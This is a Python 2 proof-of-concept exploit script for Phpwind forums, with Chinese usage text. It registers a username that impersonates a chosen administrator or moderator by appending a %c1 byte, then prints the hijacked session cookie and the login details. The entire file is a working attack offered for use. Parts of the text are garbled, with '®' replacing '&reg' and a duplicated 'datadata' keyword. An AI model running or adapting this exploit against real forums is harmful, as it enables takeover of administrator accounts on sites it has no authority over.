- 2. import urllib2,httplib,sys
- 3. httplib.HTTPConnection.debuglevel = 1
- 4. cookies = urllib2.HTTPCookieProcessor()
- 5. opener = urllib2.build_opener(cookies)
- 6.
- 7.
- 8. def banner():
- 9. print ""
- 10. print "########################################################"
- 11. print "Phpwind所有版本管理权限泄露漏洞利用poc"
- 12. print "Copyright (C) 2006"
- 13. print "jianxin@80sec.com"
- 14. print "80sec是一个新的致力于web安全的小团体"
- 15. print "http://www.80sec.com"
- 16.
- 17. def usage():
- 18. banner()
- 19. print "Usage:\n"
- 20. print "$ ./phpwind.py pwforumurl usertoattack\n"
- 21. print "pwforumurl 目标论坛地址如http://www.80sec.com/"
- 22. print "usertoattack 目标拥有权限的斑竹或管理员"
- 23. print "攻击结果将会在目标论坛注册一个和目标用户一样的帐户"
- 24. print "最新版本可以使用uid登陆"
- 25. print "其他版本可以使用cookie+useragent登陆"
- 26. print "########################################################"
- 27. print ""
- 28.
- 29.
- 30. argvs=sys.argv
- 31. usage()
- 32.
- 33.
- 34. data = "regname=%s%s1®pwd=@80sec®pwdrepeat=@80sec®email=foo@foo.com®emailtoall=1&step=2" % (argvs[2],"%c1")
- 35. pwurl = "%s/register.php" % argvs[1]
- 36.
- 37. request = urllib2.Request(
- 38. url = pwurl ,
- 39. headers = {'Content-Type' : 'application/x-www-form-urlencoded','User-Agent': '80sec owned this'},
- 40. datadata = data)
- 41.
- 42. f=opener.open(request)
- 43. headers=f.headers.dict
- 44. cookie=headers["set-cookie"]
- 45. try:
- 46. if cookie.index('winduser'):
- 47. print "Exploit Success!"
- 48. print "Login with uid password @80sec or Cookie:"
- 49. print cookie
- 50. print "User-agent: 80sec owned this"
- 51. except:
- 52. print "Error! http://www.80sec.com"
- 53. print "Connect root#80sec.com"
